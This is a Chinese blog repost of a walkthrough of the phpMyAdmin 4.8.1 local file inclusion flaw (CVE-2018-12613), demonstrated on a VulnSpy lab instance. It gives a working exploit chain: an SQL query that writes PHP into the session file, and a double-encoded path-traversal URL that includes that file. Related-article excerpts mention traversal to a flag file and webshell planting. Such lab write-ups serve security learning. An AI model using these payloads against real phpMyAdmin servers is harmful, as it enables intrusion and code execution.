phpMyAdmin 4.8.x(最新版) 本地文件包含漏洞利用

最新推荐文章于 2024-05-27 17:25:08 发布
最新推荐文章于 2024-05-27 17:25:08 发布
阅读量149 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: php python 数据库
原文链接:https://my.oschina.net/u/3722671/blog/1834081
本文介绍phpMyAdmin 4.8.1版本中存在的本地文件包含(LFI)漏洞,并通过VulnSpy在线环境演示如何利用此漏洞获得shell。无需root权限,仅需登录phpMyAdmin即可进行攻击。

2019独角兽企业重金招聘Python工程师标准>>> hot3.png

摘要: 今天ChaMd5安全团队公开了一个phpMyAdmin最新版中的本地文件包含漏洞:phpmyadmin4.8.1后台getshell。该漏洞利用不要求root帐号,只需能够登录 phpMyAdmin 便能够利用。

今天ChaMd5安全团队公开了一个phpMyAdmin最新版中的本地文件包含漏洞:phpmyadmin4.8.1后台getshell。该漏洞利用不要求root帐号,只需能够登录 phpMyAdmin 便能够利用。

在这篇文章中我们将使用VulnSpy的在线 phpMyAdmin 环境来演示该漏洞的利用。

VulnSpy 在线 phpMyAdmin 环境地址:http://www.vulnspy.com/phpmyadmin-4.8.1/

漏洞细节

参照ChaMd5安全团队发布的文章:phpmyadmin4.8.1后台getshell

漏洞利用

因为原文中包含数据库文件可能由于文件权限或者帐号权限不足而无法利用,这里我们将使用另外一种方式来利用该文件包含漏洞,即包含session文件。

1. 进入VulnSpy 在线 phpMyAdmin 环境地址,点击 Start to Hack ,跳转到VSPlate

vulnspy

2. 等待载入设置后,点击 GO 按钮开启实验

vulnspy

3. 实验创建完成后,点击演示地址进入实验

vulnspy

4. 使用帐号 root ,密码 toor 登录 phpMyAdmin

vulnspy

5. 点击顶部导航栏中的SQL按钮,执行SQL查询

select '<?php phpinfo();exit;?>'

vulnspy

6. 获取自己的SESSION ID

你的 SESSION ID 为 Cookie 中的 phpMyAdmin 项。

vulnspy

这样对应的SESSION文件为/var/lib/php/sessions/sess_你的SESSION ID

7. 包含SESSION文件,成功利用该漏洞

http://1a23009a9c9e959d9c70932bb9f634eb.vsplate.me/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_11njnj4253qq93vjm9q93nvc7p2lq82k

vulnspy

本文转载自:phpMyAdmin 4.8.x LFI Exploit - http://blog.vulnspy.com/2018/06/21/phpMyAdmin-4-8-x-LFI-Exploit/

转载于:https://my.oschina.net/u/3722671/blog/1834081

phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613)
千寻的博客
03-14 1289
phpMyAdminphpMyAdmin团队开发的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修改数据库表,执行SQL脚本命令等。攻击者可利用漏洞包含(查看并可能执行)服务器上的文件。
CVE-2018-12613 PHPmyadmin文件包含漏洞分析及漏洞利用
alert['Hello World']
11-20 4839
目录漏洞描述影响版本漏洞环境搭建漏洞分析漏洞利用漏洞加固 漏洞描述    影响版本 漏洞环境搭建 漏洞分析 漏洞利用 漏洞加固
phpMyAdmin 4.8.x 最新版 本地文件包含漏洞利用
Ambulong的博客
06-21 6113
今天ChaMd5安全团队公开了一个phpMyAdmin最新版中的本地文件包含漏洞phpmyadmin4.8.1后台getshell。该漏洞利用不要求root帐号,只需能够登录 phpMyAdmin 便能够利用。 在这篇文章中我们将使用VulnSpy的在线 phpMyAdmin 环境来演示该漏洞利用。 VulnSpy 在线 phpMyAdmin 环境地址:http://www.vulnspy.c...
PhpMyAdmin 4.0.x - 4.6.2 远程执行代码漏洞 (CVE-2016-5734)复现
haoxue__的博客
03-05 465
PhpMyAdmin 4.0.x - 4.6.2 远程执行代码漏洞 (CVE-2016-5734)复现
phpMyAdmin 4.8.x 本地文件包含漏洞利用
djt1999的博客
06-27 156
phpMyAdmin 4.8.x 本地文件包含漏洞利用 ChaMd5安全团队公开了一个phpMyAdmin最新版中的本地文件包含漏洞phpmyadmin4.8.1后台getshell。该漏洞利用不要求root帐号,只需能够登录 phpMyAdmin 便能够利用。 这一部分我们需要先了解一下LFI漏洞本地文件包含漏洞) 典型漏洞代码: <!–?php include($_GET...
phpmyadmin文件包含漏洞
Hydra的博客
10-21 1040
http://139.199.31.116:9008/index.php?target=db_sql.php%253f/../../../../../../flag.txt  
数据管理.MySQL.phpMyAdmin.4.8.0.1.Final.简体中文多语言版.rar
06-29
《数据管理:MySQL与phpMyAdmin的深度解析》 MySQL,作为全球最受欢迎的开源关系型数据库管理...phpMyAdmin 4.8.0.1的简体中文多语言版,更进一步降低了使用门槛,使得更多非英语用户也能轻松掌握数据库管理技能。
基于PHP的adminerv4.8.1取代phpmyadmin的在线管理mysql好工具源码.zip
07-29
源码的版本为v4.8.1,这意味着它包含了该工具的最新改进和修复,能够确保用户享受到稳定且安全的服务。 【标签】:“PHP”表明这个工具是用PHP编程语言编写的,这使得它能轻松地与各种PHP环境集成,包括但不限于...
04 渗透测试基础
热门推荐
weixin_43234021的博客
01-04 1万+
渗透测试基础一 代码审计1 基础环境搭建(1) Web服务:WAMP+phpstudy(2) phpstudy2 HTML 表单 一 代码审计 1 基础环境搭建 (1) Web服务:WAMP+phpstudy (2) phpstudy 启动问题 端口正常开放 80 http 3306 mysql web根目录[C:\Users\dq\Documents\phpStudy-1-24\phpStudy\WWW] php 探针 phpinfo.php phpmyadmin Apache配置文件:[
No.3-Jarvis-难度普通-HTB-walkthrough
weixin_43851945的博客
01-22 515
No.3-Jarvis-难度普通-HTB-walkthrough ** 挺有意思的一台机器,有挺多种方式拿 low priv shell。 ** 攻击机:官方Kali linux 2019 64位 作者:Ikonw 靶机介绍 一,端口扫描 只有HTTP 比较有兴趣,title 是 Stark Hotel Starting Nmap 7.80 ( https://nmap.org ) at 202...
phpmyadmin 4.8.1 远程文件包含漏洞
永不垂头的博客
08-14 986
phpmyadmin 4.8.1 远程文件包含漏洞 文章目录phpmyadmin 4.8.1 远程文件包含漏洞一、漏洞详情二、漏洞复现1.任意文件包含2.任意代码执行3.数据库写入php代码4.包函session文件三、我的公众号 一、漏洞详情 首先在index.php 50-67行代码 满足5个条件后就会include$_REQUEST[‘target’]的内容 $_REQUEST[‘target’]不为空 $_REQUEST[‘target’]是字符串 $_REQUEST[‘target’]不
文件包含漏洞--phpMyAdmin 4.8.1
xiesiyuan1的博客
02-16 1387
需要同时满足条件(参数target不为空、是字符串、不以index开头(此时如果需要加载index文件去绕过,可尝试使用xxx/../index.php)、不在数组target_blacklist中(此处也可以用xxx/../index.php的方式绕过 )、在checkPageValidity()函数中返回真)才能得到参数。因为此靶场可以对数据库直接操作,我们可以直接查找数据库文件(/MySql/data/数据库名/表名.frm),并且直接新建表,将字段名命名为一句话木马,从而将一句话木马包含进去。
phpMyAdmin 4.8.1 本地文件包含漏洞复现
weixin_51681694的博客
04-22 1105
漏洞点在根目录下的index.php中的61行target传参可任意控制,控制index.php包含任意文件上面的if条件需要满足target且为且且中黑名单:查看最后一个条件,需要返回true第一个红框定义白名单第二个红框检查文件名是否在白名单中,在则返回true第三个红框将原传入字符串从0到?前分割出来,再检查字符串是否在白名单中,在则返回true可以考虑设置字符串内容?之前的字符串为白名单,绕过过滤,可是?不能出现在文件名中最后则是利用点。
phpmyadmin4.8.1漏洞复现-远程文件包含
weixin_54555816的博客
04-10 4711
phpMyAdmin4.8.0 - 4.8.1版本均受漏洞影响。 环境搭建:phpstudy+windows+phpmyadmin4.8.1 注意要将phpmyadmin解压下载到phpstudy网站根目录 像我这里的根目录就是在www目录这里 解压之后再打开localhost/phpMyAdmin 或者127.0.0.1/phpMyAdmin 默认的初始账号和密码都是root,但是由于我之前修改了mysql的密码,所以这个密码就和MySQL的密码一样 然后来到这个phpmyadm.
phpmyadmin后台文件包含漏洞分析
nareku的博客
04-10 6261
前言 在墨者学院看到这道题给的标签是文件包含,就想着拿来练练手,果然不练不知道一练吓一跳,里面还是有很多我没学到和不懂的知识,所以就打算单独拿出来写一篇博客来记录一下。
phpmyadmin漏洞汇总
最新发布
m0_64481831的博客
05-27 3396
phpmyadmin是一个以PHP为基础,以web方式架构在网站主机上的mysql的数据库管理工具,让管理者可用web接口管理mysql数据库,便于远端管理mysql数据库
渗透测试-PhpMyAdmin后台文件包含漏洞
道阻且长,行则将至
08-10 6613
漏洞背景 背景介绍 phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。 实训目标 1、了解此漏洞形成的原因; 2、掌握此漏洞利用方式。 解题方向 根据漏洞编号找到相关知识。 攻击过程 墨者学院在线靶机:http://219.153.49.228:49400/index.php 直接...
phpmyadmin getshell总结
渗透之路,攻防之间皆学问
10-25 5497
phpMyAdmin 是一个用PHP编写的开源软件工具,可以通过web方式控制和操作MySQL数据库。通过phpMyAdmin 可以完全对数据库进行操作,例如建立、复制和删除数据等。
MySQL管理工具phpMyAdmin 4.8.0.1中文版发布
简体中文多语言版.rar"是一个打包压缩文件,包含最新版本的phpMyAdmin4.8.0.1 Final)的简体中文多语言版。用户可以通过解压缩这个文件来安装和运行phpMyAdmin,并设置为中文界面,以便更加便捷地管理和操作MySQL...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值